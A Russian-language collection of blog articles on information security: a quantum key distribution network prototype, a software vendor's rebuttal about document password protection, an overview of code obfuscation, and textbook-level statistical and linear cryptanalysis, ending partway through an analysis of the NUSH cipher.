Русский
Русский
English
Статистика
Реклама

Защита информации

Пора ли отказываться от обычного Интернета в пользу квантового?

12.12.2020 02:23:46 | Автор: admin

Современный интернет полагается на сложные алгоритмы шифрования для защиты информации, но хакеры приспосабливаются и учатся обходить такие системы, что приводит к кибератакам по всему миру. По прогнозам экспертов, ущерб экономике от кибератак продолжит свой рост, хотя мировая экономика уже теряет триллионы долларов ежегодно.С учетом этого, интерес к поиску альтернативы интернету выглядят всё более обоснованным, и создание квантовой сети выглядит хорошей заменой стандартным методам шифрования.

Благодаря команде ученых, создавших прототип многопользовательской квантовой сети, человечество стало ближе к созданию безопасного аналога интернета. В публикации разобрана квантовая сеть, объединяющая 8 пользователей в связный граф, и это самая большая на момент выхода статьи сеть, не требующая никаких доверительных узлов. То есть, любой пользователь может одновременно обмениваться защищённым ключом с любым другим, для чего требуется только 8 пар каналов длин волн и минимальное пользовательское оборудование.

Благодаря законам физики, в сети возможна передача сообщения полностью безопасными от перехвата способом. А в силу относительной, по сравнению с другими квантовыми сетями, дешевизне, также получается преодолеть серьезные проблемы, которые ранее ограничивали прогресс в этой технологии.

Запутываем определениями

Чтобы дальнейший материал был доступен для широкой аудитории, начну с азов. Уже давно физики разработали квантовое распределение ключей, метод безопасной передачи ключа. Он основан на том, что данные кодируются в состояниях фотона, которые в соответствии с законами квантовой механики меняются при попытке измерения.Этот процесс позволяет двум сторонам без риска перехвата обмениваться секретным ключом, используемым для шифрования и дешифрования информации.До недавнего времени этот метод был эффективен только между двумя пользователями.

Кроме того, в квантовой технике применяется принцип, называемый квантовой запутанностью. Это явление, при котором квантовое состояние двух или большего числа объектов должно описываться во взаимосвязи друг с другом, даже если отдельные объекты разнесены в пространстве.Этот процесс открывает большие возможности для квантовых компьютеров, сенсоров и обработки информации.

Объясняем реализацию

Более ранние модели квантовых сетей можно разбить на несколько типов:

  • Первые опирались на доверительные узлы, которые должны быть безопасны от прослушивания. На практике редко удаётся доверять каждому узлу. Кроме того, каждый узел использовал много копий принимающего и отправляющего оборудования, что заметно увеличивало затраты. Более подробно с этим вариантом сетей можно разобраться на этом примере.

  • Вторые давали возможность одновременно обмениваться ключом только определённым парам пользователей. Например, в этой статье один централизованный источник динамически распределяет двустороннюю запутанность между пользователями с помощью оптических коммутаторов.

  • Третьи сети связывали всех пользователей, но часто основывались на многочастичной запутанности, что препятствовало их масштабированию. К счастью, построить такую сеть можно и с использованием мультиплексирования. Хорошим примером может служить данная модель, но она всё равно требует O(n^{2}) каналов длин волн для n пользователей, что делает масштабирование этой технологи практически невозможным.

Благодаря использованию плотного мультиплексирования с разделением по длине волны получилось создать сеть, использующую 16 каналов длины волны. Для сравнения, в предыдущей публикации этой группы учёных для создания сети с 8 пользователями им понадобилось 56 каналов.

Если разделитьархитектуру на различные уровни абстракции, то на физическом уровне топология сети требует только одного волокна между пользователем и поставщиком услуг, в то время как на логическом уровне топология формирует связный граф между всеми 28 парами, которые можно составить из восьми пользователей.

Каждый пользователь получает четыре канала длин волн, обозначенных числом.При этом, было выбрано 16 каналов длин волн, симметрично расположенных относительно длины волны вырождения 1550,217 Нм, что соответствует 34 каналу МСЭ.На красной стороне спектра были использованы частотные каналы МСЭ 26-33, на синей каналы 35-42.Из-за хорошо определенной длины волны накачки лазера и сохранения энергии при понижающем преобразовании, оказалось возможным получить поляризационную запутанность между парами каналов (26 и 42, 27 и 41, 28 и 40 и так далее).

Все пары пользователей соединены между собой через протокол BBM92, в котором фотоны, совместно используемые всеми другими пользователями, рассматриваются как фоновый шум.Узкое окно совпадения, гарантирует, что этот шум вносит лишь минимальный вклад в частоту квантовых битовых ошибок (QBER).

Проводим эксперименты

Эксперимент разделялся на 2 этапа. На первом этапе пользователи были подключены через волокно длиной около 10 м на территории лаборатории. В течение 18.45 часов собирались данные о скорости генерации ключа. Закрытый ключ вычислялся раз в 10 минут для того, чтобы параметр безопасности составил 10^{-5} . Ниже приведена статистика для всех 28 пар пользователей.

Как можно заметить, некоторые пользователи соединены двумя фотонными парами. Например. Алиса и Гопи имеют пары {8, 8} и {2, 2}. Это помогает более эффективно управлять сетью, увеличивая скорость генерации ключа для определённых пользователей.

Поражаем результатом

Чтобы продемонстрировать функциональность на расстоянии, на 2 этапе эксперимента пользователей подключили через оптическое волокно в различных частях Бристоля, а способность передавать сообщения с помощью квантовой связи проверили при помощи существующей в городе волоконно-оптической сети.

Со стороны пользователя для подключения требовались только модуль поляризационного анализа и 2 однофотонных детектора. В итоге, на физическом уровне от пользователя требуются минимальные ресурсы для подключения, в то время как на логическом уровне каждая пара пользователей всегда имеет общую запутанную пару фотонов.

Подводим итоги

В то время как на построение предыдущих квантовых систем требовались годы, а затраты исчислялись миллионами или даже миллиардами фунтов стерлингов, эта сеть была создана за нескольких месяцев менее чем за 300 000 фунтов стерлингов.Выгода становится более наглядной по мере расширения сети, например, создание квантовой сети на 100 пользователей могло стоить около 5 миллиардов фунтов стерлингов. В то же время, доктор Джоши считает, что технология мультиплексирования может сократить затраты примерно до 4,5 миллионов фунтов стерлингов, что составляет менее 1 процента!

В последние годы квантовая криптография успешно используется для защиты транзакций между банковскими центрами в Китае и для защиты голосов на выборах в Швейцарии.Однако его более широкое применение сдерживается исключительно масштабом задействованных ресурсов и связанных с этим расходов.

По словам доктора Джоши, человечество сделало огромный шаг к созданию безопасного аналога Интернета:

С таким масштабом экономии перспектива общедоступного квантового интернета становится всё менее туманной.Мы это доказали, и, продолжая совершенствовать наши методы мультиплексирования для оптимизации и совместного использования ресурсов в сети, мы могли бы рассчитывать на обслуживание не только сотен или тысяч, но и потенциально миллионов пользователей в недалеком будущем.

Подробнее..

Изучаем безопасность офисного ПО какие механизмы влияют на защиту данных

18.12.2020 16:04:56 | Автор: admin


Недавно, издание D-Russia опубликовало авторское мнение Владимира Каталова, исполнительного директора компании Elcomsoft об уровне подверженности к взлому методом перебора защищенных паролем файлов офисного ПО. Компания специализируется на криминалистической экспертизе компьютеров, мобильных устройств и облачных данных, и в своей публикации среди прочего привела оценку безопасности продуктов МойОфис при работе с данными. Мы, как разработчик российского программного обеспечения для совместной работы с документами и коммуникациями, придерживаемся другой точки зрения и хотим обратить внимание на допущенные в публикации неточности.

Сразу стоит сказать, что некорректно приравнивать вопросы сертификации и подтверждения надежности продуктов к имплементации одной конкретной функции парольной защиты документов и, к тому же, отождествлять одну эту функцию с общим уровнем безопасности продуктов МойОфис.

Мы приветствуем экспертизу и развитие Elcomsoft в направлении защиты паролями, при этом хотим отметить, что использование механизмов шифрования документов на основе парольной информации не приводит к обеспечению надлежащего уровня конфиденциальности информации с ограниченным доступом (в обычных редакторах). Линейка защищенных решений любого производителя подразумевает использование комплексной (эшелонированной) защиты на уровне приложения, операционной системы, рабочей станции, сети и информационной инфраструктуры в целом.

МойОфис предлагает средства обеспечения информационной безопасности на уровне приложения. В решениях МойОфис реализованы технологии защиты каналов связи (TLS), функции шифрования и электронной подписи почтовых сообщений, а также возможность поддержки российских криптографических библиотек (подробнее о функциях безопасности). Продукты МойОфис регулярно проходят сертификационные испытания на соответствие требованиям действующих регламентов регулятора, и в полной мере им отвечают. В том числе, продукт МойОфис Стандартный, пробную версию которого изучали специалисты Elcomsoft в своей публикации, успешно прошел сертификацию в ФСТЭК России и получил сертификат, который определяет отсутствие недекларированных возможностей и соответствие требованиям по уровню доверия (подробнее о сертификации).

При необходимости и по желанию заказчика, решения МойОфис могут быть доукомплектованы дополнительными средствами обеспечения информационной безопасности. К числу таковых относятся, как наложенные программные средства, так и программно-аппаратные средства защиты, например защищённые ключевые носители. Продукты МойОфис совместимы с решениями КриптоПро, которые получили широкое распространение в Российской Федерации, в том числе, в органах государственной власти и крупных коммерческих структурах. Комплекс реализованных мер информационной безопасности позволяет нашим пользователям применять продукты МойОфис на объектах критической информационной инфраструктуры.

Учитывая вышесказанное, функция парольной защиты не может считаться единственным и, тем более, ключевым критерием обеспечения информационной безопасности. Из-за ряда своих технологических особенностей, она также не является и объектом сертификации. В целом, согласно действующим регламентам системы сертификации ФСТЭК России, программное обеспечение проходит оценку на предмет соответствия конкретному набору требований, и стандартная функция защиты файла паролем не заявляется как функция защиты.

Тем не менее, мы благодарны коллегам за внимание к особенностям реализации этой функции в редакторах МойОфис. Она была включена в состав продуктов в том числе с целью обеспечения совместимости с существующими файлами наших пользователей. Одним из ключевых преимуществ наших продуктов является поддержка большого количества различных форматов редакторы документов и электронных таблиц способны работать с со всеми известными форматами файлов, включая устаревшие, которые были накоплены нашими пользователями за долгие годы и до сих пор используются в их технологических процессах.

Выбор параметров функции парольной защиты обусловлен требованиями стандартов OOXML и ODF в разрезе критериев обратной совместимости. Учитывая экспоненциальную зависимость скорости подбора ключей от длины ключа, количества символов в пароле и типа используемого набора символов, нам было бы интересно узнать, при каких условиях тестирования удалось наблюдать столь значительный перекос в опубликованных результатах. Мы дополнительно усилим функцию парольной защиты, но еще раз подчеркиваем, она не может комплексно влиять на вопросы безопасности наших продуктов.

Если говорить о шифровании документов, как о методе ограничения доступа к информации, то целесообразно применять не функции парольной защиты, а использовать элементы ИОК (инфраструктуры открытых ключей). В том числе, защищать данные с помощью квалифицированных сертификатов ключей проверки электронной подписи, где уровень криптографической стойкости, включая устойчивость к механизмам подбора пароля, находится принципиально на другом уровне. Подобный способ позволяет производить шифрование с использованием технологии асимметричной криптографии, к которой не применимы атаки методом прямого перебора паролей, на которых специализируется Elcomsoft.

Стойкость электронной подписи в соответствии с ГОСТ Р 34.10-2012 основывается на сложности вычисления дискретного логарифма в группе точек эллиптической кривой, а также на стойкости используемой хэш-функции по ГОСТ Р 34.11-2012. Стандарты криптографической защиты информации разработаны Центром защиты информации и специальной связи ФСБ России совместно с ТК 26.

В статье также содержатся недостоверные данные о применяемых компонентах СПО в решениях МойОфис: это неправда, что функция парольной защиты реализована на базе технологий OpenOffice. Ядро, интерфейс, значительная часть кода платформы МойОфис, в том числе офисные редакторы написаны с нуля, полностью силами специалистов компании (всего более 1,5 млн строк собственного кода). Упоминаемая в статье функция парольной защиты является проприетарной и не имеет никакого отношения к решениям OpenOffice.

Мы приветствуем решение Elcomsoft добавить функцию восстановления паролей к зашифрованным документам и таблицам в форматах документов МойОфис в новых версиях приложений Advanced Office Password Recovery и Distributed Password Recovery. Таким образом, экосистема МойОфис пополнилась еще одним технологическим партнером, лидером в области разработки сервисных утилит в сфере информационной безопасности. Выражаем надежду на дальнейшее сотрудничество в вопросах независимого аудита программных решений МойОфис, что позволит сделать наши продукты еще лучше.
Подробнее..

Обфускация как метод защиты программного обеспечения

19.12.2020 20:12:49 | Автор: admin

Или то, почему вы не можете издать свою улучшенную версию Counter Strike и уехать жить на Гавайи.

О чём речь?

Обфускация (от английскогоobfuscate делать неочевидным, запутанным, сбивать с толку) в широком смысле - приведение исходного текста или исполняемого кода программы к виду, сохраняющему её функциональность, но затрудняющему анализ, понимание алгоритмов работы и модификацию при декомпиляции.

Красивый пример из Википедии кода, прошедшего обфускацию. Красивый пример из Википедии кода, прошедшего обфускацию.

Далее в программе

  • Зачем это нужно?

  • Как это должно работать?

  • Как это работает?

  • Методы

  • Состояние дел сейчас

Зачем это нужно?

Как известно, одним из основных методов взлома программного обеспечения является исследование кода, полученного в результате работы дизассемблера на предмет уязвимостей. На основе такого когда нетрудно, например, составить программу генерации ключей активации коммерческого программного обеспечения или, наоборот, внести в исполняемый файл изменение - патч, позволяющий злоумышленникам отключить "нежелательные" модули исходной программы.

Всему вышеперечисленному как раз и может противодействовать специальная программа - обфускатор.

Так же, алгоритмы обфускации активно используются не только для затруднения анализа кода, но и для уменьшения размера программного кода, что, в свою очередь, активно используется при разработке различных веб-сервисов и баз данных.

Как это должно работать?

Как понятно из вышесказанного, методы обфускации должны усложнить код, преобразовав его таким образом, чтобы скрыть от третьих лиц логику его работы.

В идеале хотелось бы, чтобы программа, прошедшая обфускацию, давала бы не больше информации нежели чёрный ящик, имитирующий поведение исходной программы. Гипотетический алгоритм, реализующий такое преобразование называется "Обфускация чёрного ящика". Декомпиляция зашифрованной таким образом программы дала бы злоумышленникам не больше информации, чем декомпиляция клиента мессенджера, представляющего собой лишь обёртку над апи "настоящего" приложения, что бы полностью решило поставленную в предыдущем блоке проблему. Однако показано[3], что реализация такого алгоритма для произвольной программы невозможна.

Как это работает

Большинство методов обфускации преобразуют следующие аспектов кода:

Данные: делают элементы кода похожими на то, чем они не являются

Поток кода: выставляют исполняемую логику программы абсурдной или даже недетерминированной

Структура формата: применяют различное форматирование данных, переименование идентификаторов, удаление комментариев кода и т.д.

Инструменты обфускации могут работать как с source или байт кодом, так и с бинарным, однако обфускация двоичных файлов сложнее, и должна варьироваться в зависимости от архитектуры системы.

При обфускации кода, важно правильно оценить, какие части когда можно эффективно запутать. Следует избегать обфускации кода, критичного относительно производительности.

Методы

1. Преобразование данных

Одним из наиболее важных элементов обфускации является преобразование данных, используемых программой, в иную форму, оказывающее минимальное виляние на производительность кода, но значительно усложняющее хакерам возможность обратного нижинирнга.

По ссылке можно ознакомится с интересными примерами использования двоичной формы записи чисел для усложнения читабельности кода, а так же изменений формы хранения данных и замены значений различными тождественными им выражениями.

2. Обфускация потока управления кодом

Обфускация потока управления может быть выполнена путем изменения порядка операторов выполнения программы. Изменение графа управления путем вставки произвольных инструкций перехода и преобразования древовидных условных конструкций в плоские операторы переключения, как показано на следующей диаграмме.

3. Обфускация адресов

Данный метод изменяет структура хранения данных, так чтобы усложнить их использование. Например алгоритм, может выбирать случайными адреса данных в памяти, а также относительные расстояния между различными элементами данных. Данный подход примечателен тем, что даже если злоумышленник и сможет "декодировать" данные, используемые приложением на каком-то конкретном устройстве, то на других устройствах он всё равно не сможет воспроизвести свой успех.

Подробнее об адресной обфускации можно прочесть тут.

4. Регулярное обновление кода

Этот метод предотвращает атаки, регулярно выпуская обновления обфусцированного программного обеспечения. Своевременные замены частей существующего программного обеспечения новыми обфусцированными экземплярами, могут вынудить злоумышленника отказаться от существующего результата обратного анализа, так как усилия по взлому кода в таком случае могут превысить получаемую от этого ценность.

5. Обфускация инструкций ассемблера

Преобразование и изменение ассемблерного когда также может затруднить процесс обратного инжиниринга. Одним из таких методов является использование перекрывающихся инструкций (jump-in-a-middle), в результате чего дизассемблер может произвести неправильный вывод. Ассемблерный код также может быть усилен против проникновения за счёт включения бесполезных управляющих операторов и прочего мусорного кода.

6. Обфускация отладочной информации

Отладочную информацию можно использовать для обратного проектирования программы, поэтому важно блокировать несанкционированный доступ к данным отладки. Инструменты обфускации достигают этого, изменяя номера строк и имена файлов в отладочных данных или полностью удаляя из программы отладочную информацию.

Заключение

Я не стал описывать историю развития различных подходов к обфускации, так как на мой взгляд, она неплохо отражена в уже существующей на Хабре статье.

Данная статья была написана в 2015 году, и мне не удалось найти в интернете существенного количества статей и иных материалов на тему моего поста, накопившихся за это время. На мой взгляд, в наш век всё большую популярность приобретает разработка всевозможных веб приложений, которые мало нуждаются в обфускации в качестве метода защиты информации. Однако как раз таки сжатие исходного кода программ, при помощи методов обфускации в таких приложениях зачастую оказывается полезным.

В заключение, хотел бы добавить, что при использовании методов обфускации не следует пренебрегать и прочими методами защиты вашего кода, ведь обфускация далеко не серебряная пуля в вопросе защиты программ от взлома.

Ссылки и источники

[1] https://en.wikipedia.org/wiki/Obfuscation_(software)

[2] https://www.sciencedirect.com/science/article/pii/S1877050915032780

[3] Barak B., Goldreich O., Impagliazzo R., Rudich S., Sahai A., Vadhan S. and Yang K. On the (im) possibility of obfuscating programs. CRYPTO 2001.

[4] https://www.researchgate.net/publication/235611093TechniquesofProgramCodeObfuscationforSecureSoftware

Подробнее..

Статистические техники криптоанализа

20.12.2020 00:20:11 | Автор: admin

Введение

Криптоанализ наука о том, как расшифровывать зашифрованную информацию, не имея в распоряжении ключа для расшифровки. Криптоанализом так же называется сам процесс дешифровки.

Чаще всего под криптоанализом понимается выяснение ключа шифрования, так как имея ключ криптоаналитик может расшифровать любое сообщение. Однако криптоанализ может заключаться и в анализе криптосистемы, а не только зашифрованного ею открытого сообщения, и включает также методы выявления уязвимости зашифровывающих алгоритмов.

Статистический криптоанализ это один из методов криптоанализа. Как и в любой задаче, связанной с математической статистикой, вводится понятие статистики некоторой величины, которая вычисляется на основе выборки или, в случае криптоанализа, - на основе криптограммы. В идеальном случае статистика должна быть простой в вычислении и использовании, а так же не сильно меняться от сообщения к сообщению, если эти сообщения зашифрованы одним и тем же ключом.

Цель статистического криптоанализа расшифровать конечное сообщение, используя вычисленную статистику. В этой статье представлен обзор нескольких методов статистического криптоанализа от самых простых, до используемых в современных взломах.

Частотный анализ

Простые шифры

Частотный анализ использует гипотезу о том, что символы или последовательности символов в тексте имеют некоторое вероятностное распределение, которое сохраняется при шифровании и дешифровании.

Этот метод один из самых простых и позволяет атаковать шифры простой замены, в которых символы в сообщении заменяются на другие согласно некоторому простому правилу соответствия.

Однако такой метод совершенно не работает, например, на шифрах перестановки. В них буквы или последовательности в сообщении просто меняются местами, но их количество всегда остается постоянным, как в анаграммах, поэтому ломаются все методы, основанные на вычислении частот появления символов.

Для полиалфавитных шифров шифров, в которых циклически применяются простые шифры замены подсчет символов так же не будет эффективен, поскольку для кодировки каждого символа используется разный алфавит. Число алфавитов и их распределение так же неизвестно.

Шифр Виженера

Один из наиболее известных примеров полиалфавитных шифров шифр Виженера. Он довольно прост в понимании и построении, однако после его создания еще 300 лет не находилось способа взлома этого шифра.

Пусть исходный текст это: МИНДАЛЬВАНГОГ

  1. Составляется таблица шифров Цезаря по числу букв в используемом алфавите. Так, в русском алфавите 33 буквы. Значит, таблица Виженера (квадрат Виженера) будет размером 33х33, каждая i-ая строчка в ней будет представлять собой алфавит, смещенный на i символов.

  2. Выбирается ключевое слово. Например, МАСЛО. Символы в ключевом слове повторяются, пока длина не достигнет длины шифруемого текста: МАСЛОМАСЛОМАС.

  3. Символы зашифрованного текста определяются по квадрату Виженера: столбец соответствует символу в исходном тексте, а строка символу в ключе. Зашифрованное сообщение: ЩЙЯРПШЭФМЬРПХ.

Этот шифр действительно труднее взломать, однако выделяющиеся особенности у него все же есть. На выходе все же не получается добиться равномерного распределения символов (чего хотелось бы в идеале), а значит потенциальный злоумышленник может найти взаимосвязь между зашифрованным сообщением и ключом. Главная проблема в шифре Виженера это повторение ключа.

Взлом этого шифра разбивается на два этапа:

  1. Поиск длины ключа. Постепенно берутся различные образцы из текста: сначала сам текст, потом текст из каждой второй буквы, потом из каждой третьей и так далее. В некоторый момент можно будет отвергнуть гипотезу о равномерном распределении букв в таком тексте тогда длина ключа считается найденной.

  2. Взлом нескольких шифров Цезаря, которые уже легко взламываются.

Поиск длины ключа самая нетривиальная здесь часть. Введем индекс совпадений сообщения m:

сi(m) = \sum_{i=1}^np_i^2,

где n количество символов в алфавите и

p_i частота появления i-го символа в сообщении. Эмпирически были найдены индексы совпадений для текстов на разных языков. Оказывается, что индекс совпадений для абсолютно случайного текста гораздо ниже, чем для осмысленного текста. С помощью этой эвристики и находится длина ключа.

Другой вариант применить критерий хи-квадрат для проверки гипотезы о распределении букв в сообщении. Тексты, получаемые выкидыванием некоторых символов, все равно остаются выборкой из соответствующего распределения. Тогда в критерии хи-квадрат вероятности появления символов можно выбрать используя частотные таблицы языка.

Статистические атаки насыщения

Не только простейшие шифры подвержены статистическим методам криптоанализа. Например, статистические атаки насыщения направлены на блочные шифры, которые в настоящее время широко использутся в криптографических протоколах. Проиллюстрировать принцип таких атак удобно на блочном шифре PRESENT.

PRESENT

PRESENT - блочный шифр на основе SP-сети с размером блока 64 бита, длиной ключа 80 или 128 бит и количеством раундов 32. Каждый раунд состоит в операции XOR с текущим ключом, далее происходит рассеивание пропускание через S-блоки, а затем полученные блоки перемешиваются.

Предложенная атака основывается на уязвимости шифра на этапе перемешивания. Как показано на изображении, из входных битов 5, 6, 9 и 10 s-блоков половина соединений идет в те же самые биты. И это только один пример подобной слабости. Значит, фиксируя 16 битов на входе 5, 6, 9 и 10 s-блоков, можно определить 8 входных битов для этих блоков на следующем раунде.

Предполагая ключ на данном шаге, криптоаналитик может по выбранном распределению выбранных 8 битов на входе определить распределение тех же 8 битов на выходе. Проделав эту процедуру для каждого ключа, можно понять все возможные распределения выбранных 8 выходных битов 5, 6, 9 и 10 s-блоков на каждом слое, применяя алгоритм итеративно.

Когда криптоаналитик знает для каждого ключа, как распределены выбранные 8 битов на каждом слое, он может сравнить полученные распределения с теми, которые получаются в реальной системе. Для этого нужен доступ к алгоритму шифрования и большое количество текстов для шифрования. Из всех возможных ключей выбирается тот, который минимизирует расстояние между теоретическим и экспериментальным распределениями.

Линейный криптоанализ

Еще один метод взлома блочных шифров линейный криптоанализ. Он является одним из самых распространенных подходов. Анализ основывается на построении соотношений между открытым текстом P, ключом K и зашифрованным сообщением C, а затем их использовании для нахождения ключа.

Соотношения в алгоритме это уравнения следующего вида:

P_{i_1} \oplus P_{i_2} \oplus ... \oplus P_{i_a} \oplus C_{j_1} \oplus ... \oplus C_{k_b} = K_{k_1} \oplus ... \oplus K_{k_c}.

Вероятность выполнения этого соотношения для произвольно выбранных битов примерно равна 0.5. Цель линейного криптоанализа найти такие наборы битов, что эта вероятность сильно отличается от 0.5 в одну или другую сторону. Вероятности подсчитываются путем полного перебора всех возможных значений входов для S-блока.

Ключ находится следующим образом:

Для каждого возможного набора битов ключа проверяется, на скольких парах текст-шифротекст выполняется найденное соотношением. Выбирается тот набор битов, для которого отклонение числа пар от половины всех пар наибольшее.

Линейный криптоанализ оказался очень мощным инструментом и может применять не только к блочным, но и к потоковым шифрам.

Заключение

В данной статье были рассмотрены наиболее известные техники статистического криптоанализа от простейшего частотного анализа до современных методов взлома блочных шифров. Сложность современных шифров все увеличивается, но статистика помогает найти в них уязвимости, поэтому методы криптоанализа все еще находят свое применение, несмотря на высказывания о его конце.

Подробнее..

Линейный криптоанализ на примере блочного алгоритма шифрования NUSH

21.12.2020 12:20:35 | Автор: admin

Введение

В современном мире остро стоит вопрос о конфиденциальности данных при обмене ими и их хранении, которая достигает за счет все возможных способов шифрования. Однако при появление новых алгоритмов шифрования начинают проводиться работы по изучению способов нарушить конфиденциальность данных, то есть ищут атаки на них.

В наше время широко распространены блочные алгоритмы шифрования, такие как AES, Кузнечик и др. Одним из потенциально эффективных способов проведения атак на них является линейный криптоанализ. Основную концепцию данного метода изложил Мицуру Мацуи (Mitsuru Matsui) в работе Linear Cryptoanalysis Method for DES Cipher [1] в 90х годах. Суть данного метода будет изложена в разделе 2 данной статьи.

В качестве примера эффективного использования данного метода представлен линейный криптоанализ блочного алгоритма шифрования NUSH [2], краткая справка по которому будет приведена ниже.

Основы линейного криптоанализа

Как было написано выше суть линейного криптоанализа изложена в Linear Cryptoanalysis Method for DES Cipher. При использование линейного криптоанализа предполагается, что известна структура шифра и что криптоаналитик обладает достаточной статистической выборкой шифротекст-открытый ключ, полученной на одном ключе.

После выполнения перечисленных выше требований структуру алгоритма заменяют простой линейной функцией. Как правило анализ линейных функций куда проще, чем нелинейных функций самого шифра, что может свести задачу анализа шифра к анализу его линейной модификации. Далее из полученной системы функций криптоаналитик угадывает биты ключа с определенной вероятностью.

Пусть <x,y> = x_1*y_1+x_2*y_2+...+x_n*y_n скалярное произведение двоичных векторов по модулю 2. И пусть P,C,K открытый текст, шифротекст и ключ соответственно.

Определение 1

Линейным приближением шифра называется соотношение L:

<P,\alpha>\oplus<C,\beta>=<K,\gamma>

которое выполняется с вероятностью 1 \backslash 2 + \varepsilon Величина \varepsilon преобладанием линейного соотношения, а векторы \ \alpha, \beta, \gamma - называются масками.

Из определения несложно видеть, что для увеличения вероятности отгадывания ключа требуется увеличивать преобладание.

По мимо этого для приведенного ниже примера нам потребуется знание леммы Мацуи.

Лемма Мацуи (Pilling-up лемма, лемма О набегании знаков)

Пусть X_i где 1 \leq i \leq n - независимые случайные величины, принимающие значения из \mathbb {Z}_2 . Пусть

P \{X_i = 0\} = 1 \backslash 2 + \varepsilon_i

где 1 \leq \varepsilon_i \leq 1 \backslash 2 . Тогдаслучайная величина X_1 \oplus X_2 \oplus ... \oplus X_n принимает значение 0 с вероятностью 1 \backslash 2 + \varepsilon , где \varepsilon = 2^{n-1} \prod^{n}_{i=1} \varepsilon_i

Следствие 1: если \varepsilon_j = 0 , где j \in \overline{1,n} то итоговое преобладание равно нулю.

Доказательство можно найти по ссылке.

NUSH

В 2000 году был объявлен европейский исследовательский проект для определения безопасных шифровальных алгоритмов NESSIE одним из участников, которого выступал блочный алгоритм симметричного шифрования, разработанный Анатолием Лебедевым и Алексеем Волчковым для российской компании LAN Crypto NUSH. Алгоритм имеет несколько вариантов, отличающихся количеством раундов и длиной ключа (64, 128, 192 и 256 битов).

Его отличительной особенностью от других участников являлось отсутствие S- и P-блоков, а само шифрование проводилось только с использованием арифметических операций (XOR, AND и т.д.). В результате чего процесс шифрования ожидаемо проходит быстро. Это легко показать, если вспомнить, что сложность битовых операций O(k) , где k битовая длина модуля.

Шифрование

Пусть N = 4n длина шифруемого блока открытого текста P = P_0 P_1 P_2 P_3 . После чего выбирается по расписанию KS_i (start key) на основе ключа К. Затем побитово добавляется к исходному тексту: a_0 b_0 c_0 d_0 = P_0 P_1 P_2 P_3 \oplus KS_0 KS_1 KS_2 KS_3 . На следующем этапе происходит r-1 задаваемых уравнениями, в которых KR_i (subKey) - раундовые подключи, # побитовая конъюнкция или дизъюнкция, выбираемая в соответствии с расписанием, C_i,S_i известные константы, \gg j циклический сдвиг вправо на j бит:

{ for ( i=1...r-1 ) \\ a_i = b_{i-1} b_i=((c_i \oplus (KR_{i-1}+C_{i-1}))+b_{i-1}) \gg S_{i-1} \\ c_i = d_{i-1} \\ d_i = a_i \oplus (b_i \# d_i)}

Последняя итерация отличается от основных только отсутствием перестановки после вычисления выражений в правых частях равенств:

{a_r = a_{r-1} + (c_r \# d_{r-1}) \\ b_r = b_{r-1} \\ c_r = ((c_{r-1} \oplus (KR_r+C_{r-1})+b_{r-1})) \gg S_{r-1} \\ d_r = d_{r-1}}

Выход: зашифрованный блок M_0 M_1 M_2 M_3 = a_r b_r c_r d_r \oplus KF_0 KF_1 KF_2 KF_3

Расшифрование

На первом итерации происходит

{d_{r-1} = d_r \\ b_{r-1} = b_r a_{r-1} = a_r - (c_r \# d_{r-1}) \\ a_{r-1} = a_r - (c_r \# d_r{r-1}) \\ c_{r-1} = c_r \gg (n- S_{r-1}) }

После чего происходит r-1 итерация

{ for(i=r-1...1) \\ d_{i-1} = c_i \\ b_{i-1} = a_i \\ a_{i-1} = d_i - (b_i \# c_{i-1}) \\ c_{i-1} = (b_i \gg (n-S_{i-1}))-KR_{i-1}-a_{i-1}}

Линейный криптоанализ NUSH

Из алгоритма шифрования, приведенного выше, следует, что с вероятностью 1 выполняется

{ a_i[0] = b_{i-1}[0] \quad (1) }

Тогда обозначим через f(x,y)=x \# y булевую функцию. Легко можно убедиться, что сложение по модулю два не изменяется соотношение вероятностей для p=0.75 или p=0.25 . Таким образом мы имеем линейную апроксимацию с p=0.75 или p=0.25 для d_i :

{d_i = a_{i-1}[0] \oplus b_i[0] \oplus d_{i-1}[0] \quad (2)}

Используя (1) и (2) получаем линейную апроксимацию раундовой функции с вероятностью p=0.75

a_i[0] \oplus b_i[0] \oplus d_i[0] = a_{i-1}[0] \oplus b_{i-1}[0] \oplus d_{i-1}[0] \oplus \theta \quad (3)

где \theta = 0 если # AND и \theta = 1 если # OR.

Теперь получим связь между внутренними значениями открытого текста, шифротекста и ключа.

Рассмотрим связь между a_1[0] \oplus b_1[0] \oplus d_1[0] и между открытым текстом и ключом. Из алгоритма шифрования получаем, что S_0 = 4 , b_1[0] зависит от c_0[0-4] , b_0[0-4] , KR_0[0-4] и C_0[0-4] . Здесь c_0[0-4]

означает последние 5 бит c_0 . Следовательно a_1[0] \oplus b_1[0] \oplus d_1[0] зависит от a_0[0-4] , b_0[0] , c_0[0] , d_0[0-4] , KR_0[0-4] и C_0[0-4] . И эту зависимость можно выразить через функцию

f_1:

a_1[0] \oplus b_1[0] \oplus d_1[0] = f_1 \begin{pmatrix} P_0[0], P_1[0-4], P_2[0-4], P_3[0], \\ KS_0[0], KS_1[0-4], KS_2[0-4], KS_3[0], KR_0[0-4] \end{pmatrix} \quad (4)

Можно получить связь для a_2[0] \oplus b_2[0] \oplus d_2[0] и для открытого текста с ключом. Действую аналогичным образом получим, что a_2[0] \oplus b_2[0] \oplus d_2[0] зависит только от P_3[0] \oplus KS_0[0] , P_2[0-11] \oplus KS_1[0-11] , P_1[0-11] \oplus KS_2[0-11] , P_0 [0-7] \oplus KS_2[0-7] , KR_0 [0-11] и KR_1[0-7] .И эту зависимость можно выразить через функцию f_2 :

a_2[0] \oplus b_2[0] \oplus d_2[0] = f_2 \begin{pmatrix} P_0[0-7], P_1[0-11], P_2[0-11], P_3[0], \\ KS_0[0], KS_1[0-11], KS_2[0-11], KS_3[0-7], KR_1[0-7] \end{pmatrix} \quad (5)

Можно получить связь для a_3[0] \oplus b_3[0] \oplus d_3[0] и для открытого текста с ключом. Действую аналогичным образом получим, что a_3[0] \oplus b_3[0] \oplus d_3[0] зависит только от P , KS_0[0-11] , KS_1 , KS_2 , KS_3 , KR_0 , KR_1[0] и KR_2[0-11] . И эту зависимость можно выразить через функцию f_3 :

a_3[0] \oplus b_3[0] \oplus d_3[0] = f_3(P, KS_0[0-11], KS_1, KS_2, KS_3, KR_0, KR_1, KR_2[0-11]) \quad (6)

Теперь определим связь между a_{32}[0] \oplus b_{32}[0] \oplus d_{32}[0] и для открытого текста с ключом. Из алгоритма расшифрования известно, что

{ d_{32}[0] = c_{33}[0] \\ b_{32}[0] = a_{33}[0] \\ a_{32}[0] = d_{33}[0] \oplus (b_{33}[0] \& c_{32}[0])} \quad { \space \\ (7)}

